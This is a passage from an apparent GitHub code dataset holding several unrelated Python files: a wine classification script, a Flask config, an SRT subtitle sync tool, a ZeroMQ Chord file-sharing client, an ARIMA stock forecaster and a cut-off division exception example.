\n\n######################################################################################\n\n# prepare and run k-fold for Classification\n\nfrom sklearn.model_selection import KFold\nkf = KFold(n_splits=5,random_state=9, shuffle=False)\ntotal_accuracy,n=0,0\nfor train_index, test_index in kf.split(wine_X):\n    #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n    X_train, X_test = wine_X.iloc[train_index,:], wine_X.iloc[test_index,:]\n    y_train, y_test = wine_y.iloc[train_index], wine_y.iloc[test_index]\n    LRfit()\n    total_accuracy+=accuracy_score(y_test, y_pred)\n    n+=1\n    MAC=total_accuracy/n\n    print(total_accuracy , MAC)\n    \n\n\n######################################################################################## \n\n#----------- Decision Tree Classifier and K-Fold Implementation ---------------\nwine_X= wine_clean.drop(['quality','LR3'],axis=1)\nwine_y=wine_clean['LR3']\n \nX_train, X_test, y_train, y_test = train_test_split(wine_X, wine_y, random_state = 0)\n\nfrom sklearn.tree import DecisionTreeClassifier\ndef DTCfit():\n    global dtc_gini\n    dtc_gini = DecisionTreeClassifier(criterion='gini', max_depth=3, random_state=9, splitter='best')\n    dtc_gini.fit(X_train,y_train)\n    global y_pred\n    y_pred = dtc_gini.predict(X_test)\nDTCfit(); \n#print confusion matrix and accuracy score\nprint(accuracy_score(y_test, y_pred))\nsns.scatterplot(X_test, y_pred, color = 'blue')\n#prepare k-fold \n\nfrom sklearn.model_selection import KFold\nkf = KFold(n_splits=10,random_state=9, shuffle=False)\ntotal_accuracy,n=0,0\nfor train_index, test_index in kf.split(wine_X):\n    #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\n    X_train, X_test = wine_X.iloc[train_index,:], wine_X.iloc[test_index,:]\n    y_train, y_test = wine_y.iloc[train_index], wine_y.iloc[test_index]\n    DTCfit()\n    Accuracy=accuracy_score(y_test, y_pred)*100\n    total_accuracy+=Accuracy\n    n+=1\n    MAC=total_accuracy/n\n    print('K-Fold# =',n)\n    #print(\"Confusion Matrix : \\n\",confusion_matrix(y_test, y_pred))\n    print('Accuracy : {} \\t Average_Accuracy : {} '.format(Accuracy,MAC))\n    \n    \n    \n#####################################################################################\n    \n#Visualisation of the tree\nfrom sklearn import tree\ntree.plot_tree(dtc_gini) \n\n\nplt.subplot()\n","repo_name":"kchamarty/classification_wine","sub_path":"wine_classsification.py","file_name":"wine_classsification.py","file_ext":"py","file_size_in_byte":11156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27524918203","text":"import os\nfrom datetime import timedelta\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nimport tiktoken\n\nSECRET_KEY = os.getenv(\"SECRET_KEY\")\nSESSION_TYPE = \"filesystem\"\nSESSION_PERMANENT = True\nPERMANENT_SESSION_LIFETIME = timedelta(minutes=180)\n\nSESSION_COOKIE_SECURE = True\nSESSION_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SAMESITE = \"Strict\"\nTEMPLATES_AUTO_RELOAD = True\n\nTOKENIZER = tiktoken.get_encoding(\"cl100k_base\")\nEMBEDDING_MODEL = \"text-embedding-ada-002\"\nGPT_MODEL = \"gpt-4-1106-preview\"\nMAIN_TEMP_DIR = \"app/main_user_directory\"\nMAX_LENGTH = 500\nTOP_N = 30\nBATCH_SIZE = 10\nALLOWED_EXTENSIONS = {\"txt\", \"pdf\", \"docx\"}\n\nCLEANUP_THRESHOLD_SECONDS = 3600\nSUPPORTED_FORMATS = (\".mp3\", \".mp4\", \".mpeg\", \".mpga\", \".m4a\", \".wav\", \".webm\")\nMAX_CONTENT_LENGTH = 50 * 1024 * 1024  # 50MB\nINITIAL_PROMPT = \"Hello, welcome to my lecture.\"\nMAX_FILE_SIZE = 100 * 1024 * 1024\nMAX_AUDIO_FILE_SIZE = 25 * 1024 * 
1024\n","repo_name":"rawcsav/AIUtilsFlask","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20586733012","text":"#! python3\r\n# srt_sync.py\r\n\r\n'''\r\nTO DO:\r\n\r\n- Raise exceptions for invalid slice arguments\r\n\t- Raise exception if index parameter is out of range\r\n\t- Raise exception if start index >= end index\r\n- Fix negative offset (related to optional arguments)\r\n- Match the last line of the file(?)\r\n- Merge / Split / Delete methods\r\n- Check overlaps / negative duration / short display time / long lines\r\n'''\r\n\r\n# imports ======================================================================\r\n\r\nfrom collections import namedtuple\r\nimport argparse\r\nimport logging\r\nimport os\r\nimport re\r\nimport sys\r\n\r\n\r\n# logging definitions ==========================================================\r\n\r\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')\r\n#logging.disable(logging.DEBUG)\r\n\r\n\r\n# constants ====================================================================\r\n\r\nConstants = namedtuple('Constants', ['SRT_PATTERN', 'TIMESTAMP_PATTERN'])\r\nconstants = Constants(\r\n\r\n\t# SRT_PATTERN --------------------------------------------------------------\r\n\tr'''\t\t\t\t\t\t\t\t# https://regex101.com/r/eSrmb9/6\r\n\t(\\d+)[\\r]?[\\n]\t\t\t\t\t\t# index\r\n\t(\\d\\d):(\\d\\d):(\\d\\d),(\\d\\d\\d)\t\t# starting hour, mins, secs, msecs\r\n\t[ ]-->[ ]\t\t\t\t\t\t\t# timestamp division\r\n\t(\\d\\d):(\\d\\d):(\\d\\d),(\\d\\d\\d)\t\t# ending hour, mins, secs, msecs\r\n\t(\t\t\t\t\t\t\t\t\t# optional positional coordinates\r\n\t\t[ ]{1,2}\r\n\t\tX1:(\\d{3})[ ]\t\t\t\t\t# X1 coordinate\r\n\t\tX2:(\\d{3})[ ]\t\t\t\t\t# X2 coordinate\r\n\t\tY1:(\\d{3})[ ]\t\t\t\t\t# Y1 coordinate\r\n\t\tY2:(\\d{3})\t\t\t\t\t\t# Y2 coordinate\r\n\t)?\r\n\t[\\r]?[\\n]\r\n\t(((.+)[\\r]?[\\n])+)\t\t\t\t\t# content\r\n\t''', \r\n\r\n\t# TIMESTAMP_PATTERN --------------------------------------------------------\r\n\tr'''\t\t\t\t\t\t\t\t# https://regex101.com/r/pexG8G/2\r\n\t^([+-])?\t\t\t\t\t\t\t# offset sign\r\n\t(\r\n\t\t(([0-5]?\\d):)?\t\t\t\t\t# hours\r\n\t\t(([0-5]?\\d):)\t\t\t\t\t# minutes\r\n\t)?\r\n\t([0-5]?\\d)\t\t\t\t\t\t\t# seconds\r\n\t([,](\\d\\d?\\d?))?$\t\t\t\t\t# msecs\r\n\t'''\r\n)\r\n\r\n\r\n# classes ======================================================================\r\n\r\nclass Movie():\r\n\r\n\tdef __init__(self, srt_path):\r\n\t\tif not os.path.exists(srt_path):\r\n\t\t\traise FileNotFoundError('SRT file could not be found.')\r\n\t\tif not (os.path.isfile(srt_path) and srt_path.lower().endswith('.srt')):\r\n\t\t\traise TypeError('The file is not a valid SRT subtitle.')\r\n\r\n\t\tsrt_file = open(srt_path, 'r')\r\n\t\tsrt_content = srt_file.read()\r\n\t\tsrt_file.close()\r\n\r\n\t\tsrt_ro = re.compile(constants.SRT_PATTERN, re.VERBOSE)\r\n\t\tsrt_match = srt_ro.findall(srt_content)\r\n\t\tif not srt_match:\r\n\t\t\traise ValueError('No subtitles to load.')\r\n\t\t\r\n\t\tself.subtitles = []\r\n\t\tfor sub in srt_match:\r\n\t\t\ti = int(sub[0])\r\n\t\t\th0 = int(sub[1])\r\n\t\t\tm0 = int(sub[2])\r\n\t\t\ts0 = int(sub[3])\r\n\t\t\tms0 = int(sub[4])\r\n\t\t\th1 = int(sub[5])\r\n\t\t\tm1 = int(sub[6])\r\n\t\t\ts1 = int(sub[7])\r\n\t\t\tms1 = int(sub[8])\r\n\t\t\tif sub[9] == '':\r\n\t\t\t\tpos = None\r\n\t\t\telse:\r\n\t\t\t\tpos = ( \r\n\t\t\t\t\tint(sub[10]), 
\r\n\t\t\t\t\tint(sub[11]), \r\n\t\t\t\t\tint(sub[12]), \r\n\t\t\t\t\tint(sub[13])\r\n\t\t\t\t)\r\n\t\t\tcontent = sub[14].strip('\\r\\n').replace('\\r', '').split('\\n')\r\n\t\t\tself.subtitles.append(Subtitle(\r\n\t\t\t\ti, \r\n\t\t\t\t((h0 * 3600) + (m0 * 60) + (s0)) * 1000 + ms0, \r\n\t\t\t\t((h1 * 3600) + (m1 * 60) + (s1)) * 1000 + ms1, \r\n\t\t\t\tpos, \r\n\t\t\t\tcontent\r\n\t\t\t))\r\n\r\n\r\n\tdef offset_subtitles(self, offset_timestamp, first_index=1, last_index=None):\r\n\t\toffset_msecs = timestamp_to_millisecs(offset_timestamp)\r\n\t\tfor sub in self.subtitles[first_index-1:last_index]:\r\n\t\t\ttime_start = sub.time_start + offset_msecs\r\n\t\t\ttime_end = sub.time_end + offset_msecs\r\n\t\t\tif (time_start < 0) or (time_end < 0):\r\n\t\t\t\traise ValueError('Subtitle timestamp can not be negative.')\r\n\t\t\telse:\r\n\t\t\t\tsub.time_start = time_start\r\n\t\t\t\tsub.time_end = time_end\r\n\r\n\r\n\tdef scale_subtitles(self, scale_factor, first_index=1, last_index=None):\r\n\t\tif type(scale_factor) != float:\r\n\t\t\traise TypeError('Scale factor needs to be a float value.')\r\n\t\tfor sub in self.subtitles[first_index-1:last_index]:\r\n\t\t\ttime_start = int(sub.time_start * scale_factor)\r\n\t\t\ttime_end = int(sub.time_end * scale_factor)\r\n\t\t\tif (time_start < 0) or (time_end < 0):\r\n\t\t\t\traise ValueError('Subtitle timestamp can not be negative.')\r\n\t\t\telse:\r\n\t\t\t\tsub.time_start = time_start\r\n\t\t\t\tsub.time_end = time_end\r\n\r\n\r\n\tdef interpolate_subtitles(self, first_timestamp, last_timestamp, first_index=1, last_index=None):\r\n\t\tfirst_time_original = self.subtitles[first_index-1].time_start\r\n\t\tif last_index:\r\n\t\t\tlast_time_original = self.subtitles[last_index].time_start\r\n\t\telse:\r\n\t\t\tlast_time_original = self.subtitles[-1].time_start\r\n\t\tfirst_time_sync = timestamp_to_millisecs(first_timestamp)\r\n\t\tlast_time_sync = timestamp_to_millisecs(last_timestamp)\r\n\t\t\r\n\t\tif (first_time_sync < 0) or (last_time_sync < 0):\r\n\t\t\traise ValueError('Subtitle timestamp can not be negative.')\r\n\t\t\r\n\t\tif first_time_sync >= last_time_sync:\r\n\t\t\traise ValueError('The last timestamp has to be higher than the first timestamp.')\r\n\t\t\t\r\n\t\tfor sub in self.subtitles[first_index-1:last_index]:\r\n\t\t\tsub.time_start = int(linear_interpolation(\r\n\t\t\t\tfirst_time_original, \r\n\t\t\t\tlast_time_original, \r\n\t\t\t\tfirst_time_sync, \r\n\t\t\t\tlast_time_sync, \r\n\t\t\t\tsub.time_start\r\n\t\t\t))\r\n\r\n\t\t\tsub.time_end = int(linear_interpolation(\r\n\t\t\t\tfirst_time_original, \r\n\t\t\t\tlast_time_original, \r\n\t\t\t\tfirst_time_sync, \r\n\t\t\t\tlast_time_sync, \r\n\t\t\t\tsub.time_end\r\n\t\t\t))\r\n\r\n\r\n\tdef get_srt_syntax(self):\r\n\t\tsrt_string = ''\r\n\t\tfor sub in self.subtitles:\r\n\t\t\tsrt_string += sub.get_srt_syntax()\r\n\t\t\r\n\t\tassert len(re.compile(constants.SRT_PATTERN, re.VERBOSE).findall(srt_string)) == len(self.subtitles), 'Invalid srt syntax output.'\r\n\r\n\t\treturn srt_string\r\n\r\n\r\nclass Subtitle():\r\n\r\n\tdef __init__(self, index, time_start, time_end, position, content):\r\n\t\tself.index = index\r\n\t\tself.time_start = time_start\r\n\t\tself.time_end = time_end\r\n\t\tself.position = position\r\n\t\tself.content = content\r\n\r\n\r\n\tdef get_timestamp_str(self, timestamp):\r\n\t\t\tif timestamp == 'start':\r\n\t\t\t\tms = self.time_start\r\n\t\t\telif timestamp == 'end':\r\n\t\t\t\tms = self.time_end\r\n\t\t\telse:\r\n\t\t\t\traise ValueError('Invalid parameter: 
\\'{}\\''.format(timestamp))\r\n\t\t\treturn millisecs_to_timestamp(ms)\r\n\r\n\r\n\tdef get_position_str(self):\r\n\t\tif self.position:\r\n\t\t\treturn ' X1:{:0>3d}'.format(self.position[0]) + \\\r\n\t\t\t\t ' X2:{:0>3d}'.format(self.position[1]) + \\\r\n\t\t\t\t ' Y1:{:0>3d}'.format(self.position[2]) + \\\r\n\t\t\t\t ' Y2:{:0>3d}'.format(self.position[3])\r\n\t\telse:\r\n\t\t\treturn ''\r\n\r\n\r\n\tdef get_srt_syntax(self):\r\n\t\tsrt_string = '{}\\n'.format(self.index) + \\\r\n\t\t\t\t\t '{} --> {}'.format(self.get_timestamp_str('start'), self.get_timestamp_str('end')) + \\\r\n\t\t\t\t\t '{}\\n'.format(self.get_position_str()) + \\\r\n\t\t\t\t\t '{}\\n\\n'.format('\\n'.join(self.content))\r\n\t\t\r\n\t\treturn srt_string\r\n\r\n\r\n# functions ====================================================================\r\n\r\ndef timestamp_to_millisecs(timestamp):\r\n\ttimestamp_ro = re.compile(constants.TIMESTAMP_PATTERN, re.VERBOSE)\r\n\r\n\tmatch = timestamp_ro.search(timestamp)\r\n\t\r\n\tif match == None:\r\n\t\traise ValueError('Incorrect offset syntax: [+/-]HH:MM:SS,MSC')\r\n\r\n\tif match.group(1) == '-':\r\n\t\tsign = -1\r\n\telse:\r\n\t\tsign = 1\r\n\t\r\n\tif match.group(4):\r\n\t\th = int(match.group(4))\r\n\telse:\r\n\t\th = 0\r\n\r\n\tif match.group(6):\r\n\t\tm = int(match.group(6))\r\n\telse:\r\n\t\tm = 0\r\n\r\n\tif match.group(7):\r\n\t\ts = int(match.group(7))\r\n\telse:\r\n\t\ts = 0\r\n\t\r\n\tif match.group(9):\r\n\t\tms = int(match.group(9)) * (10 ** (3 - len(match.group(9))))\r\n\telse:\r\n\t\tms = 0\r\n\r\n\treturn (((h * 3600) + (m * 60) + (s)) * 1000 + ms) * sign\r\n\r\n\r\ndef millisecs_to_timestamp(ms):\r\n\tif type(ms) != int:\r\n\t\traise TypeError('\\'ms\\' parameter must be a positive int.')\r\n\tif ms < 0:\r\n\t\traise ValueError('\\'ms\\' parameter must be a positive int.')\r\n\t\t\r\n\th = ms // 3600000 % 24\r\n\tm = ms // 60000 % 60\r\n\ts = ms // 1000 % 60\r\n\tms = ms % 1000\r\n\t\r\n\treturn '{:0>2d}:{:0>2d}:{:0>2d},{:0>3d}'.format(h, m, s, ms)\r\n\r\n\r\ndef linear_interpolation(xMin, xMax, yMin, yMax, x):\r\n\treturn (((x - xMin) * (yMax - yMin)) / (xMax - xMin)) + yMin\r\n\r\n\r\n# main =========================================================================\r\n\r\ndef main():\r\n\r\n\t# Argument parser\r\n\tparser = argparse.ArgumentParser(prog='srt_sync', description='srt_sync: Python module for syncing .srt format subtitles.')\r\n\tparser.add_argument('filepath', type=str, help='Path to the \\'.srt\\' subtitle file.')\r\n\tparser.add_argument('-first_index', type=int, default=1, help='Index of the first subtitle to synchronize.')\r\n\tparser.add_argument('-last_index', type=int, default=None, help='Index of the last subtitle to synchronize.')\r\n\t\r\n\tsubparsers = parser.add_subparsers(help='Available Commands.', dest='command', required=True)\r\n\r\n\tparser_offset = subparsers.add_parser('offset')\r\n\tparser_offset.add_argument('offset_timestamp', type=str, help='Offset timestamp for all subtitles.')\r\n\t\r\n\tparser_offset = subparsers.add_parser('scale')\r\n\tparser_offset.add_argument('scale_factor', type=float, help='Scale factor for all subtitles.')\r\n\r\n\tparser_interpolate = subparsers.add_parser('interpolate')\r\n\tparser_interpolate.add_argument('first_timestamp', type=str, help='New timestamp for the first subtitle.')\r\n\tparser_interpolate.add_argument('last_timestamp', type=str, help='New timestamp for the last subtitle.')\r\n\r\n\targs = parser.parse_args()\r\n\tlogging.debug(args)\r\n\t\r\n\ttry:\r\n\t\t# Load 
movie\r\n\t\tmovie = Movie(args.filepath)\r\n\r\n\t\t# Offset movie\r\n\t\tif args.command == 'offset':\r\n\t\t\tmovie.offset_subtitles(args.offset_timestamp, args.first_index, args.last_index)\r\n\r\n\t\t# Scale movie\r\n\t\telif args.command == 'scale':\r\n\t\t\tmovie.scale_subtitles(args.scale_factor, args.first_index, args.last_index)\r\n\r\n\t\t# Interpolate movie\r\n\t\telif args.command == 'interpolate':\r\n\t\t\tmovie.interpolate_subtitles(args.first_timestamp, args.last_timestamp, args.first_index, args.last_index)\r\n\r\n\t\t# Get SRT syntax for the synced subtitles\r\n\t\tmovie_srt_syntax = movie.get_srt_syntax()\r\n\t\r\n\texcept Exception as err:\r\n\t\tprint('Error: ' + str(err))\r\n\t\tsys.exit()\r\n\r\n\t# Save synced file\r\n\tsynced_file = open(args.filepath, 'w')\r\n\tsynced_file.write(movie_srt_syntax)\r\n\tsynced_file.close()\r\n\t\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"dariusdan/srt_sync","sub_path":"srt_sync.py","file_name":"srt_sync.py","file_ext":"py","file_size_in_byte":9990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70523413650","text":"import zmq\nimport hashlib \nimport sys\nimport os\n\nPS = 1024 * 1024\n\n# Encode and Decode data\nclass Code:\n\tdef __init__(self,f):\n\t\tself.format = f\n\tdef deco(self, data):\n\t\treturn data.decode(self.format)\n\tdef enco(self, data):\n\t\treturn data.encode(self.format)\n\n# Get sha hash \nclass Sha:\n\tdef __init__(self, v):\n\t\tself.version = v\n\tdef getHash(self, file):\n\t\tif (self.version == '1'):\n\t\t\treturn hashlib.sha1(file).hexdigest()\n\t\tif (self.version == '256'):\n\t\t\treturn hashlib.sha256(file).hexdigest()\n\n\nclass Chord_Client:\n\tdef __init__(self):\n\t\tself.context = zmq.Context()\n\t\t#Utilidades\n\t\tself.coder = Code('ascii')\n\t\tself.hasher = Sha(256)\n\n\tdef run(self):\n\t\t\n\t\ttry:\n\t\t\tcommand = sys.argv[1]\n\t\texcept:\n\t\t\tprint('You must use an action: upload or download')\n\n\t\tif command == 'state':\n\t\t\tself.state(sys.argv[2])\n\t\telif command == 'upload':\n\t\t\tself.upload(sys.argv[2], sys.argv[3])\n\t\telif command == 'download':\n\t\t\tself.download(sys.argv[2], sys.argv[3])\n\n\tdef send_request(self, req, address, send='multipart', recv='multipart'):\n\t\tsocket = self.context.socket(zmq.REQ)\n\t\tsocket.connect(\"tcp://\"+address)\n\n\t\tif(send=='multipart'):\n\t\t\tsocket.send_multipart(req)\n\t\telif(send=='json'):\n\t\t\tsocket.send_json(req)\n\n\t\tif(recv=='multipart'):\n\t\t\tres = socket.recv_multipart()\n\t\telif(recv=='json'):\n\t\t\tres = socket.recv_json()\n\n\t\tsocket.close()\n\t\treturn res\n\n\tdef upload_segment(self,name_file, segment, server_address, chord_file = False):\n\t\tname_segment = hashlib.sha1(segment).hexdigest()\n\t\t#print(name_segment, type(name_segment))\n\t\tif chord_file:\n\t\t\trequest = [b'upload chord file',self.coder.enco(name_segment),segment]\n\t\telse:\n\t\t\trequest = [b'upload',self.coder.enco(name_segment),segment]\n\n\t\taddress = server_address\n\t\twhile True:\n\t\t\tresponse = self.send_request(request,address)\n\t\t\tif self.coder.deco(response[0]) == 'success upload':\n\t\t\t\tprint(\"Segment was upload: {} on server {}\".format(name_segment,address))\n\t\t\t\treturn True\n\t\t\telif self.coder.deco(response[0]) == 'chord file exist':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\taddress = self.coder.deco(response[1])\n\t\t\t\tif address == server_address:\n\t\t\t\t\treturn False\n\n\tdef finish_chord_file(self, 
name_file, complete_hash):\n\t\tf = open(name_file+\".chord\", \"r\")\n\t\tlines = f.readlines()\n\t\tlines.insert(0,complete_hash+'\\n')\n\t\tlines.insert(0,name_file+'\\n')\n\t\tf.close()\n\t\tf = open(name_file+\".chord\", \"w\")\n\t\tf.writelines(lines)\n\t\tf.close()\n\n\tdef upload_chord_file(self, name_file, server_address):\n\t\twith open(name_file, 'rb') as f:\n\t\t\tchord_data = f.read()\n\t\t\thash_chord_file = hashlib.sha1(chord_data).hexdigest()\n\t\t\tres = self.upload_segment(hash_chord_file,chord_data,server_address, chord_file=True)\n\t\t\tif res:\n\t\t\t\tprint('Magnet link is already!: '+ hash_chord_file)\n\t\t\t\treturn hash_chord_file\t\t\t\n\t\t\telse:\n\t\t\t\tprint('The file already exist en chord, you can use this magnet link to donwload: '+ hash_chord_file)\n\t\t\t\treturn ''\n\n\tdef upload_file(self, name_file, server_address):\n\t\twith open(name_file, 'rb') as f:\n\t\t\twhile True:\n\t\t\t\tsegment = f.read(PS)\n\t\t\t\tif not segment:\n\t\t\t\t\tbreak\n\t\t\t\tres = self.upload_segment(name_file,segment, server_address)\n\t\t\t\tif not res:\n\t\t\t\t\tprint(\"The upload was canceled\")\n\t\t\t\t\tbreak\n\t\t\t\t\n\tdef upload(self, name_file, server_address):\n\t\tself.clear_file(name_file+\".chord\")\n\t\tf = open(name_file, 'rb')\n\t\tcf = open(name_file+\".chord\", \"a\")\n\t\tsha1 = hashlib.sha1()\n\t\twhile True:\n\t\t\tsegment = f.read(PS)\n\t\t\tif not segment:\n\t\t\t\tcf.close()\n\t\t\t\tf.close()\n\t\t\t\tself.finish_chord_file(name_file,\tsha1.hexdigest())\n\t\t\t\tres = self.upload_chord_file(name_file+\".chord\",server_address)\n\t\t\t\tif res:\n\t\t\t\t\tself.upload_file(name_file, server_address)\n\t\t\t\t\tprint(\"The file was upload! The magnet link is: \"+ res)\n\t\t\t\tbreak\n\t\t\tname_segment = hashlib.sha1(segment).hexdigest()\n\t\t\tcf.write(name_segment+\"\\n\")\n\t\t\tsha1.update(segment)\n\n\tdef download_segment(self,name_file,name_segment,server_address):\n\t\trequest = [b'download',self.coder.enco(name_segment)]\n\t\taddress = server_address\n\t\twhile True:\n\t\t\tresponse = self.send_request(request,address)\n\t\t\tif self.coder.deco(response[0]) == 'success download':\n\t\t\t\twith open(name_file, 'ab') as f:\n\t\t\t\t\tf.write(response[1])\n\t\t\t\treturn True\n\t\t\telif self.coder.deco(response[0]) == 'file not found error':\n\t\t\t\tprint(\"Segment not found!\")\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\taddress = self.coder.deco(response[1])\n\t\t\t\tif address == server_address:\n\t\t\t\t\tprint(\"Hash out of limits!\")\n\t\t\t\t\treturn False\n\n\tdef clear_file(self,name_file):\n\t\tf = open(name_file, 'w')\n\t\tf.write('')\n\t\tf.close()\n\n\tdef download(self,chord_file, server_address):\n\t\tif '.chord' in chord_file:\n\t\t\twith open(chord_file, 'r') as f:\n\t\t\t\tlines = f.readlines()\n\t\t\t\tname_file = lines.pop(0)[:-1]\n\t\t\t\tcomplete_hash = lines.pop(0)[:-1]\n\t\t\t\tcont = 0\n\t\t\t\tself.clear_file(name_file)\n\t\t\t\tfor name_segment in lines:\n\t\t\t\t\tname_segment = name_segment[:-1]\n\t\t\t\t\tprint(cont, name_segment)\n\t\t\t\t\tcont += 1\n\t\t\t\t\tres = self.download_segment(name_file,name_segment,server_address)\n\t\t\t\t\tif not res:\n\t\t\t\t\t\tprint('Donwload was canceled, an error has occurred')\n\t\t\t\t\t\tbreak\n\t\t\t\tself.check_integrity(complete_hash, name_file)\n\t\t\t\tprint('Donwload finished!')\n\t\telse:\n\t\t\tif len(chord_file) == 40:\n\t\t\t\tprint(\"Downloading with magnet link!\")\n\t\t\t\tres = self.download_segment('temp.chord',chord_file,server_address)\n\t\t\t\tif not 
res:\n\t\t\t\t\tprint(\"Magnet link invalid!\")\n\t\t\t\telse:\n\t\t\t\t\tself.download('temp.chord',server_address)\n\t\t\t\t\tos.remove('temp.chord')\n\t\t\telse:\n\t\t\t\tprint(\"Cord file or magnet link invalid\")\n\n\tdef check_integrity(self,complete_hash, name_file):\n\t\twith open(name_file, \"rb\") as f:\n\t\t\tsha1 = hashlib.sha1()\n\t\t\twhile True:\n\t\t\t\tsegment = f.read(PS)\n\t\t\t\tif not segment:\n\t\t\t\t\tif sha1.hexdigest() == complete_hash:\n\t\t\t\t\t\tprint(\"Succefully download: \\nHash registered:\\t{}\\nHash download:\\t{}\".format(complete_hash,sha1.hexdigest()))\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Failure download: File corrupted!\")\n\t\t\t\t\tbreak\n\t\t\t\tsha1.update(segment)\n\n\tdef state(self, address):\n\t\trequest = [b'state']\n\t\tintial_address = address\n\t\tcurrent_address = address\n\t\twhile(True):\n\t\t\tresponse = self.send_request(request,current_address,recv='json')\n\t\t\tprint(\"Chord State--------->\")\n\t\t\tprint(\"Name: \"+response['name'])\n\t\t\tprint(\"Address: \"+response['address'])\n\t\t\tprint(\"Lim: \"+', '.join(list(map(str,response['lim']))))\n\t\t\tprint(\"Successor: \"+response['successor'])\n\t\t\tprint(\"Predecessor: \"+response['predecessor'])\n\t\t\tprint(\"-------------------->\")\n\t\t\tcurrent_address = response['successor']\n\t\t\tif(intial_address == current_address):\n\t\t\t\tbreak\n\nif __name__ == \"__main__\":\n\tclient = Chord_Client()\n\tclient.run()","repo_name":"HectorMontillo/Servidor-de-Archivos-PyZmq","sub_path":"clientfolder/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70231099092","text":"import itertools\nimport numpy as np\nimport pandas as pd\nimport yfinance as yf\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass Time_Series:\n \n def __init__(self) -> None:\n pass\n \n def get_data(self, ticker_symbol):\n \"\"\"This function is for loading the 7-day of stock price by minute\n \n Parameters\n ----------\n ticker_symbol : str\n the ticker symbol from a specific company\n \n Returns\n -------\n pandas dataframe\n a dataframe contains stock price\n \"\"\"\n try:\n \n # get stock price:\n data = yf.download(tickers = ticker_symbol, period = \"7d\", interval = \"1m\", \n progress = False\n )\n # print out the latest timestamp of the data:\n print(f\"The last timestamp of the data (New York timezone): {data.index[-1].strftime('%Y-%m-%d %H:%M:%S')}\")\n \n self.data = data\n return self.data\n \n except Exception as err:\n print(err) \n \n def split(self):\n \"\"\"This function is for train & test split for time series data\n\n Returns\n -------\n series\n train & test series\n \"\"\"\n try:\n train = self.data[['Open']].iloc[:-50]\n test = self.data[['Open']].iloc[-50:]\n \n self.train = train\n self.test = test\n \n return self.train, self.test\n \n except Exception as err:\n print(err)\n \n def make_log(self):\n \"\"\"This function is for taking log1p transform on stock price.\n\n Returns\n -------\n train_1, test_1\n the train & test after taking log1p transform\n \"\"\"\n try:\n train_1 = np.log1p(self.train)\n test_1 = np.log1p(self.test)\n \n self.train_1 = train_1\n self.test_1 = test_1\n\n return self.train_1, self.test_1\n \n except Exception as err:\n print(err) \n\n def generate_params(self):\n \"\"\"This function is for generating P, D, Q 
permutation for ARIMA model.\n\n Returns\n -------\n params, list\n a list of each P, D, Q combination\n \"\"\"\n try:\n p = range(1, 7)\n d = range(1, 3)\n q = range(3)\n params = list(itertools.product(p, d, q))\n \n self.params = params\n \n return self.params\n \n except Exception as err:\n print(err) \n \n def training(self, i, xtrain, xtest):\n \"\"\"This function is for ARIMA model training.\n\n Parameters\n ----------\n i : tuple\n the (P, D, Q) combination\n xtrain : pandas series\n the training series \n xtest : pandas series\n the test series\n\n Returns\n -------\n prediction, list\n a list of prediction\n \"\"\"\n try:\n prediction = []\n \n for j in range(len(xtest)):\n try:\n model = ARIMA(xtrain, order = i).fit()\n pred = model.forecast()[0]\n prediction.append(pred)\n xtrain = xtrain.append(pd.Series(xtest.iloc[j]), ignore_index = True)\n \n except:\n prediction.append(np.nan)\n \n return prediction\n \n except Exception as err:\n print(err) \n \n def rmse_calculation(self):\n \"\"\"This function is for ARIMA model training & get a list of RMSE of each\n permutation of (P, D, Q)\n\n Returns\n -------\n rmse_box, list\n a list of RMSE from ARIMA model training with each (P, D, Q) permutation\n best_pdq, tuple\n a tuple of the best (P, D, Q)\n \"\"\"\n try:\n rmse_box = []\n for i in self.params[:1]:\n try:\n train_2 = self.train_1.copy()\n prediction = self.training(i, train_2, self.test_1)\n rmse = np.sqrt(\n mean_squared_error(np.expm1(self.test_1), np.expm1(prediction))\n )\n rmse_box.append(rmse)\n # print(f\"(P, D, Q): {i}, RMSE: {rmse}\")\n except:\n rmse_box.append(np.nan)\n # print(f\"(P, D, Q): {i}, RMSE: nan\")\n \n best_pdq = self.params[rmse_box.index(min(rmse_box))]\n # print(f\"smallest RMSE: {min(rmse_box)}, \\\n # (P, D, Q) = {best_pdq}.\") \n \n self.rmse_box = rmse_box\n self.best_pdq = best_pdq\n \n return self.rmse_box, self.best_pdq\n \n except Exception as err:\n print(err) \n \n def final_training(self):\n \"\"\"This function is to get the final model and make a prediction for \n the next minute open price.\n\n Returns\n -------\n str\n a message to show the next minute open price\n \"\"\"\n try:\n final_model = ARIMA(self.data[['Open']], order = self.best_pdq).fit()\n pred = final_model.forecast()[0]\n next_open_price = float(np.round_(pred, 2))\n \n return f\"The open price will be ${next_open_price} in the next minute.\"\n \n except Exception as err:\n print(err) \n","repo_name":"bellepmshen/time_series_real_time_forecast","sub_path":"time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35575929628","text":"def divisao():\n try:\n dividendo = int(input('Insira o dividendo: '))\n divisor = int(input('Insira o divisor: '))\n resultado = dividendo / divisor\n print(resultado)\n except ZeroDivisionError:\n print('Ops... 
